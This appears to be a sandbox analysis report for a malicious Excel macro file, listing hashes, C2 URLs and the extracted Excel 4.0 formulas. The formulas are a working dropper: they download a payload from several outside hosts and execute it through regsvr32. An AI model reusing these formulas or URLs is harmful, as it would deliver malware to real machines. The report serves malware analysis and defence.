Overview

overview

10

Static

static

10

4dabc91bdf...6.xlsm

windows7-x64

10

4dabc91bdf...6.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    4dabc91bdf6e69e97c9595395d283906bafc945af546a4116513a1f344f18ab6

  • Size

    29KB

  • Sample

    241120-jthkfayleq

  • MD5

    7ae1c887379eda9abf51d00e6c37d5ae

  • SHA1

    f66dcf5bb37d15c23dd4a787bc17e442764116ab

  • SHA256

    4dabc91bdf6e69e97c9595395d283906bafc945af546a4116513a1f344f18ab6

  • SHA512

    d4c8078282222dfc53fcab90a24a86811ed74ff77ead5f3b350fbfb50b61f0f07b1c7949b0d76bfb40805a4975818e67196dd9ae56329c137165d7be9ca85e05

  • SSDEEP

    384:lDr77gLEQgRL2sOr1U6ZlEnBcvgSTxxZkN6L+tjU5qhd8VqBHO8D9JJJ4IVwb:ZPELA2s61VECvgOZS4+NcDVOXD9F4IG

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://janshabd.com/E33ZFv/

http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/

http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/

http://www.aacitygroup.com/mordacity/g29PQhuYA5x/

http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/

https://sse-studio.com/cq0xhpj/wdktmllfAYV/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://janshabd.com/E33ZFv/","..\dw.ocx",0,0) =IF('OFJOV'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/","..\dw.ocx",0,0)) =IF('OFJOV'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/","..\dw.ocx",0,0)) =IF('OFJOV'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.aacitygroup.com/mordacity/g29PQhuYA5x/","..\dw.ocx",0,0)) =IF('OFJOV'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/","..\dw.ocx",0,0)) =IF('OFJOV'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sse-studio.com/cq0xhpj/wdktmllfAYV/","..\dw.ocx",0,0)) =IF('OFJOV'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dw.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://janshabd.com/E33ZFv/
xlm40.dropper

http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/

Targets

    • Target

      4dabc91bdf6e69e97c9595395d283906bafc945af546a4116513a1f344f18ab6

    • Size

      29KB

    • MD5

      7ae1c887379eda9abf51d00e6c37d5ae

    • SHA1

      f66dcf5bb37d15c23dd4a787bc17e442764116ab

    • SHA256

      4dabc91bdf6e69e97c9595395d283906bafc945af546a4116513a1f344f18ab6

    • SHA512

      d4c8078282222dfc53fcab90a24a86811ed74ff77ead5f3b350fbfb50b61f0f07b1c7949b0d76bfb40805a4975818e67196dd9ae56329c137165d7be9ca85e05

    • SSDEEP

      384:lDr77gLEQgRL2sOr1U6ZlEnBcvgSTxxZkN6L+tjU5qhd8VqBHO8D9JJJ4IVwb:ZPELA2s61VECvgOZS4+NcDVOXD9F4IG

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks